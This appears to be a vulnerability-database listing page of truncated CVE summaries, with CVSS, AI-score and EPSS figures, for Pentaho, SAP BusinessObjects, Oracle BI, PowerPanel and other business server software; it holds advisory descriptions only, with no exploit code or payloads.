Business Server Security Vulnerabilities
Hitachi Vantara Pentaho Business Analytics Server versions before 10.1.0.0 and 9.3.0.7, including 8.3.x do not correctly protect the ACL service endpoint of the Pentaho User Console against XML External Entity...
7.1CVSS
7AI Score
0.0004EPSS
Hitachi Vantara Pentaho Business Analytics Server prior to versions 10.1.0.0 and 9.3.0.7, including 8.3.x allow a malicious URL to inject content into the Analyzer plugin...
8.8CVSS
8.6AI Score
0.0004EPSS
Hitachi Vantara Pentaho Business Analytics Server prior to versions 10.1.0.0 and 9.3.0.7, including 8.3.x allow a malicious URL to inject content into the Analyzer plugin...
8.8CVSS
8.6AI Score
0.0004EPSS
Local privilege escalation vulnerability allowed an attacker to misuse ESET's file operations during a restore operation from...
7.3CVSS
7.4AI Score
0.0004EPSS
Absolute path traversal vulnerability exists in ID Link Manager and FUJITSU Software TIME CREATOR. If this vulnerability is exploited, the file contents including sensitive information on the server may be retrieved by an unauthenticated remote...
6.8AI Score
0.0004EPSS
On Unix, SAP BusinessObjects Business Intelligence Platform (Scheduling) allows an authenticated attacker with administrator access on the local server to access the password of a local account. As a result, an attacker can obtain non-administrative user credentials, which will allow them to read.....
3.7CVSS
4.2AI Score
0.0004EPSS
Hard-coded credentials for the CyberPower PowerPanel test server can be found in the production code. This might result in an attacker gaining access to the testing or production...
9.8CVSS
6.7AI Score
0.0004EPSS
A specially crafted Zip file containing path traversal characters can be imported to the CyberPower PowerPanel server, which allows file writing to the server outside the intended scope, and could allow an attacker to achieve remote code ...
8.8CVSS
7.4AI Score
0.0004EPSS
The application allows a high privilege attacker to append a malicious GET query parameter to Service invocations, which are reflected in the server response. Under certain circumstances, if the parameter contains a JavaScript, the script could be processed on client...
4.8CVSS
6.5AI Score
0.0004EPSS
5.7CVSS
6.2AI Score
0.0005EPSS
The Staff / Employee Business Directory for Active Directory WordPress plugin before 1.2.3 does not sanitize and escape data returned from the LDAP server before rendering it in the page, allowing users who can control their entries in the LDAP directory to inject malicious javascript which could.....
5.4CVSS
5.4AI Score
0.0004EPSS
7.2CVSS
7.2AI Score
0.002EPSS
7.2CVSS
7.2AI Score
0.002EPSS
7.2CVSS
7.2AI Score
0.002EPSS
A Cross-Site Request Forgery (CSRF) vulnerability affecting Teamwork Cloud from No Magic Release 2021x through No Magic Release 2022x could allow with some very specific conditions an attacker to send a specifically crafted query to the...
7.5CVSS
7.5AI Score
0.001EPSS
The Staff / Employee Business Directory for Active Directory plugin for WordPress is vulnerable to LDAP Passback in versions up to, and including, 1.2.3. This is due to insufficient validation when changing the LDAP server. This makes it possible for authenticated attackers, with administrative...
4.9CVSS
5.2AI Score
0.001EPSS
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.5.0.0 and 9.3.0.4, including 8.3.x.x, saves passwords of the Hadoop Copy Files step in...
4.9CVSS
5.1AI Score
0.0005EPSS
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). Supported versions that are affected are 6.4.0.0.0 and 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to...
4.3CVSS
4.1AI Score
0.0004EPSS
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). The supported version that is affected is 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle...
4.3CVSS
4.2AI Score
0.0004EPSS
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). Supported versions that are affected are 6.4.0.0.0 and 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to...
5.4CVSS
5.1AI Score
0.0005EPSS
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). Supported versions that are affected are 6.4.0.0.0 and 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to...
4.3CVSS
4.1AI Score
0.0005EPSS
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). Supported versions that are affected are 6.4.0.0.0 and 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to...
5.4CVSS
5.2AI Score
0.0004EPSS
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). The supported version that is affected is 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle...
4.3CVSS
4.1AI Score
0.0005EPSS
Missing HTTP headers (X-Frame-Options, Content-Security-Policy) in KNIME Business Hub before 1.4.0 has left users vulnerable to click jacking. Clickjacking is an attack that occurs when an attacker uses a transparent iframe in a window to trick a user into clicking on an actionable item, such...
4.3CVSS
4.6AI Score
0.001EPSS
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.3, including 8.3.x expose dashboard prompts to users who are not part of the authorization...
4.3CVSS
4.7AI Score
0.0005EPSS
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.3, including 8.3.x deserialize untrusted JSON data without constraining the parser to approved classes and...
8.8CVSS
8.6AI Score
0.001EPSS
Use of default password vulnerability in PowerPanel Business Local/Remote for Windows v4.8.6 and earlier, PowerPanel Business Management for Windows v4.8.6 and earlier, PowerPanel Business Local/Remote for Linux 32bit v4.8.6 and earlier, PowerPanel Business Local/Remote for Linux 64bit v4.8.6 and.....
9.8CVSS
9.5AI Score
0.005EPSS
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). The supported version that is affected is 6.4.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle...
5.7CVSS
5.4AI Score
0.001EPSS
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). The supported version that is affected is 6.4.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle...
5.7CVSS
5.4AI Score
0.001EPSS
Hitachi Vantara Pentaho Business Analytics Server versions before 9.3.0.0, 9.2.0.4 and 8.3.0.27 does not correctly perform an authorization check in the dashboard editor plugin...
8.1CVSS
8AI Score
0.001EPSS
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.3.0.0, 9.2.0.4 and 8.3.0.27 allow a malicious URL to inject content into a dashboard when the CDE plugin is...
6.5CVSS
6.2AI Score
0.0005EPSS
SAP NetWeaver AS for ABAP (Business Server Pages) - versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allows an attacker authenticated as a non-administrative user to craft a request with certain parameters in certain circumstances which can consume the server's resources...
6.5CVSS
6.2AI Score
0.001EPSS
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.0 and 9.3.0.2, including 8.3.x display the full parametrized SQL query in an error message when an invalid character is used within a Pentaho Report...
4.3CVSS
5AI Score
0.001EPSS
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x contain security restrictions using non-canonical URLs which can be...
9.8CVSS
9.4AI Score
0.003EPSS
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x cannot allow a system administrator to disable scripting capabilities of Pentaho Reports (*.prpt) through the JVM script...
8.8CVSS
8.3AI Score
0.001EPSS
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x do not correctly protect the Post Analysis service endpoint of the data access plugin against out-of-band XML External Entity...
7.1CVSS
6.5AI Score
0.001EPSS
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x allow a malicious URL to inject content into the Pentaho User Console through session...
6.1CVSS
6.2AI Score
0.001EPSS
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x do not correctly perform an authorization check in the data source management...
8.8CVSS
8.6AI Score
0.001EPSS
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.0 and 9.3.0.2, including 8.3.x display the target path on host when a file is uploaded with an invalid character in its...
4.3CVSS
4.6AI Score
0.001EPSS
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.0 and 9.3.0.1, including 8.3.x, using the Pentaho Data Access plugin exposes a service endpoint for CSV import which allows a user supplied path to access resources that are out of...
6.5CVSS
6.4AI Score
0.001EPSS
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x cannot allow a system administrator to disable scripting capabilities of the Community Dashboard Editor (CDE)...
6.3CVSS
6.1AI Score
0.001EPSS
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.0 and 9.3.0.1, including 8.3.x with the Big Data Plugin expose the username and password of clusters in clear text into system...
6.5CVSS
6.5AI Score
0.001EPSS
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x allow certain web services to set property values which contain Spring templates that are interpreted...
8.8CVSS
8.1AI Score
0.562EPSS
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x is installed with a sample HSQLDB data source configured with stored procedures...
8.8CVSS
8.5AI Score
0.001EPSS
In Eclipse BIRT, starting from version 2.6.2, the default configuration allowed to retrieve a report from the same host using an absolute HTTP path for the report parameter (e.g. __report=http://xyz.com/report.rptdesign). If the host indicated in the __report parameter matched the HTTP Host header....
8.8CVSS
8.4AI Score
0.001EPSS
SAP BusinessObjects Business Intelligence Platform (Web Services) - versions 420, 430, allows an attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal...
5.3CVSS
5.3AI Score
0.001EPSS
In SAP BusinessObjects Business Intelligence Platform - version 420, 430, an attacker can control a malicious BOE server, forcing the application server to connect to its own CMS, leading to a high impact on...
7.5CVSS
7.4AI Score
0.001EPSS
In SAP BusinessObjects Business Intelligence Platform (Web Services) - versions 420, 430, an attacker can control a malicious BOE server, forcing the application server to connect to its own admintools, leading to a high impact on...
7.5CVSS
7.4AI Score
0.001EPSS
SAP Business Object (Adaptive Job Server) - versions 420, 430, allows remote execution of arbitrary commands on Unix, when program objects execution is enabled, to authenticated users with scheduling rights, using the BI Launchpad, Central Management Console or a custom application based on the...
9CVSS
8.7AI Score
0.002EPSS